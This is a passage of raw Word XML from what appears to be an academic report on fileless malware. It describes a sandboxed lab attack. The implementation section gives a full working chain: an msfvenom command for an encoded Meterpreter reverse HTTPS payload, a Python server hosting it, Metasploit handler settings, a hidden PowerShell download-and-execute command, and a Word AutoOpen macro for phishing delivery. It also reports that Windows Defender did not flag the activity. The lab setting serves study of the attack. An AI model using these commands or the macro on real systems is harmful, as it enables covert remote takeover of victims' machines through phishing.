          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>behavioural</w:t>
      </w:r>
      <w:r w:rsidRPr="00F606EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> analysis to catch these silent threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F402664" w14:textId="788D3892" w:rsidR="008D0E66" w:rsidRPr="008D0E66" w:rsidRDefault="008D0E66" w:rsidP="008D0E66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc194070984"/>
      <w:r w:rsidRPr="008D0E66">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>3.Implementation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="2F5C47B1" w14:textId="43472D6B" w:rsidR="002926C7" w:rsidRPr="008D0E66" w:rsidRDefault="002926C7" w:rsidP="008D0E66">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc194070985"/>
      <w:r w:rsidRPr="008D0E66">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.1 Fileless Malware Using PowerShell + Metasploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidRPr="008D0E66">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02372C6B" w14:textId="77777777" w:rsidR="002926C7" w:rsidRDefault="002926C7" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E66">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This implementation simulates a real-world fileless attack that leverages native Windows utilities, memory-resident payloads, and remote access. It draws from attack patterns described in Ali et al. (2022) and Sun et al. (2023), where PowerShell is used to deliver and execute malicious code without writing anything to disk. The experiment was executed in a completely sandboxed environment, using two virtual machines to replicate attacker and victim systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3876DFC2" w14:textId="03096188" w:rsidR="00EC693E" w:rsidRPr="008D0E66" w:rsidRDefault="00EC693E" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC693E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>https://github.com/athulck/Fileless-Malware/blob/main/SourceCode.cpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AFB38E" w14:textId="77777777" w:rsidR="002926C7" w:rsidRPr="008D0E66" w:rsidRDefault="002926C7" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E66">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B29DC0" w14:textId="447F558D" w:rsidR="002926C7" w:rsidRPr="00AB494E" w:rsidRDefault="002926C7" w:rsidP="00AB494E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB494E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Attacker System: Kali Linux (VirtualBox VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D0C340" w14:textId="742B2000" w:rsidR="002926C7" w:rsidRPr="00AB494E" w:rsidRDefault="002926C7" w:rsidP="00AB494E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB494E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Victim System: Windows 10 Pro (VirtualBox VM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0A5EF2" w14:textId="0E3475BC" w:rsidR="002926C7" w:rsidRPr="00AB494E" w:rsidRDefault="002926C7" w:rsidP="00AB494E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB494E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Network: Host-only adapter, no internet access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B664578" w14:textId="0A8E5280" w:rsidR="002926C7" w:rsidRPr="00AB494E" w:rsidRDefault="002926C7" w:rsidP="00AB494E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB494E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Tools Used: Metasploit Framework, msfvenom, PowerShell, Python HTTP server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4748EC36" w14:textId="451656BC" w:rsidR="002926C7" w:rsidRPr="008D0E66" w:rsidRDefault="002926C7" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E66">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Key </w:t>
      </w:r>
      <w:r w:rsidR="008D0E66" w:rsidRPr="008D0E66">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BA939E" w14:textId="10951D9D" w:rsidR="002926C7" w:rsidRPr="00AB494E" w:rsidRDefault="002926C7" w:rsidP="00AB494E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB494E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Encrypted HTTPS reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E1786F" w14:textId="4493893E" w:rsidR="002926C7" w:rsidRPr="00AB494E" w:rsidRDefault="002926C7" w:rsidP="00AB494E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB494E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Encoded PowerShell command to evade detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65378541" w14:textId="6E34FE2C" w:rsidR="002926C7" w:rsidRPr="00AB494E" w:rsidRDefault="002926C7" w:rsidP="00AB494E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB494E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Download-and-execute pattern that mimics macro behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D857BCF" w14:textId="0AC01455" w:rsidR="002926C7" w:rsidRPr="00AB494E" w:rsidRDefault="002926C7" w:rsidP="00AB494E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB494E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Simulated phishing delivery (e.g., Word document with embedded script)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616365F0" w14:textId="05D8B28F" w:rsidR="002926C7" w:rsidRPr="008D0E66" w:rsidRDefault="002926C7" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E66">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementation Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7319C248" w14:textId="4CE78573" w:rsidR="002926C7" w:rsidRDefault="002926C7" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E66">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Payload Generation (Metasploit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746DE0FC" w14:textId="42233FF6" w:rsidR="00B068FC" w:rsidRPr="00B068FC" w:rsidRDefault="00B068FC" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E66">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The payload is encoded in base64 to evade basic PowerShell logging or AV signature scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF5418A" w14:textId="77777777" w:rsidR="002C195D" w:rsidRDefault="008D0E66" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E66">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Command: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3F4BC7" w14:textId="403F0024" w:rsidR="002926C7" w:rsidRPr="008D0E66" w:rsidRDefault="002926C7" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E66">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.56.1 LPORT=443 -f ps1 -e cmd/powershell_base64 &gt; payload.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2970A4D7" w14:textId="77777777" w:rsidR="00B068FC" w:rsidRDefault="002926C7" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B068FC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Hosting the Payload (Python HTTP Server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53775CA7" w14:textId="4E5BB902" w:rsidR="002926C7" w:rsidRPr="00B068FC" w:rsidRDefault="00B068FC" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E66">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>The payload is served over HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CBEC90" w14:textId="77777777" w:rsidR="002C195D" w:rsidRDefault="00B068FC" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E66">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Command:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63473442" w14:textId="1AE02A85" w:rsidR="002926C7" w:rsidRPr="002C195D" w:rsidRDefault="002926C7" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B068FC">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B068FC">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B068FC">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DACAD21" w14:textId="77777777" w:rsidR="002926C7" w:rsidRPr="002C195D" w:rsidRDefault="002926C7" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C195D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Starting the Listener (Metasploit Handler):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247AAD12" w14:textId="1E50EE4B"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114E5C77"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msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063DFB4E"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use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE8A0C"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payload windows/meterpreter/reverse_https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E62B65D"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LHOST 192.168.56.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFAFCFB"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LPORT 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F996C56" w14:textId="1B70656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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDE0B83" w14:textId="524B3B30" w:rsidR="002926C7" w:rsidRDefault="002926C7" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C195D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Execution on the Victim (Obfuscated PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186AFE6A" w14:textId="60EC052E" w:rsidR="002C195D" w:rsidRPr="002C195D" w:rsidRDefault="002C195D" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D0E66">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This command suppresses PowerShell warnings (-nop) and hides the execution window (-w hidden).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206C8C7D" w14:textId="0016137E"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7F566076"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('http://192.168.56.1/payload.ps1')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37166B45" w14:textId="0DCEFD1C" w:rsidR="002926C7" w:rsidRPr="002C195D" w:rsidRDefault="00777CB7" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="002926C7" w:rsidRPr="002C195D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Macro payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721E1047" w14:textId="170B3435"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0663684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 xml:space="preserve">Sub </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002C195D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AutoOpen(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002C195D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA5638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 xml:space="preserve">    Shell "powershell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 xml:space="preserve">('http://192.168.56.1/payload.ps1')", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002C195D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vbHide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23B041D7" w14:textId="08D03282" w:rsidR="002926C7" w:rsidRPr="00777CB7" w:rsidRDefault="002926C7" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C195D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3FAE0B" w14:textId="04FFA572" w:rsidR="002926C7" w:rsidRPr="00777CB7" w:rsidRDefault="00777CB7" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="002926C7" w:rsidRPr="002C195D">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Results &amp; Observations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EBC27A" w14:textId="77CB7D09" w:rsidR="002926C7" w:rsidRPr="00BE49A9" w:rsidRDefault="002926C7" w:rsidP="00BE49A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Meterpreter session opened successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2EABD2" w14:textId="53EAF5E2" w:rsidR="002926C7" w:rsidRPr="00BE49A9" w:rsidRDefault="002926C7" w:rsidP="00BE49A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>No files were saved to disk at any point during execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B35FB7" w14:textId="244024AF" w:rsidR="002926C7" w:rsidRPr="00BE49A9" w:rsidRDefault="002926C7" w:rsidP="00BE49A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>AV software (Windows Defender) did not flag the activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325B43CF" w14:textId="680DBB84" w:rsidR="002926C7" w:rsidRPr="00BE49A9" w:rsidRDefault="002926C7" w:rsidP="00BE49A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>System logs showed PowerShell activity but no executable drops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F5294C" w14:textId="6596EF6E" w:rsidR="002926C7" w:rsidRPr="00777CB7" w:rsidRDefault="00777CB7" w:rsidP="008D0E66">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00777CB7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.Link to real life Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1500EA" w14:textId="7209F42D" w:rsidR="002926C7" w:rsidRPr="00BE49A9" w:rsidRDefault="002926C7" w:rsidP="00BE49A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulated phishing vector </w:t>
      </w:r>
      <w:r w:rsidR="00621584" w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>brings it close to real life cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEC1C45" w14:textId="2B4405E0" w:rsidR="002926C7" w:rsidRPr="00BE49A9" w:rsidRDefault="002926C7" w:rsidP="00BE49A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Encrypted connection over HTTPS hides payload contents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D622FAB" w14:textId="3727F6EF" w:rsidR="002926C7" w:rsidRPr="00BE49A9" w:rsidRDefault="002926C7" w:rsidP="00BE49A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Obfuscation and stealth parameters make detection harder, aligning with techniques used in</w:t>
      </w:r>
      <w:r w:rsidR="00B9065E" w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE49A9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>APT campaigns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6730C817" w14:textId="33C6C437" w:rsidR="002926C7" w:rsidRPr="00B9065E" w:rsidRDefault="002926C7" w:rsidP="00B9065E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
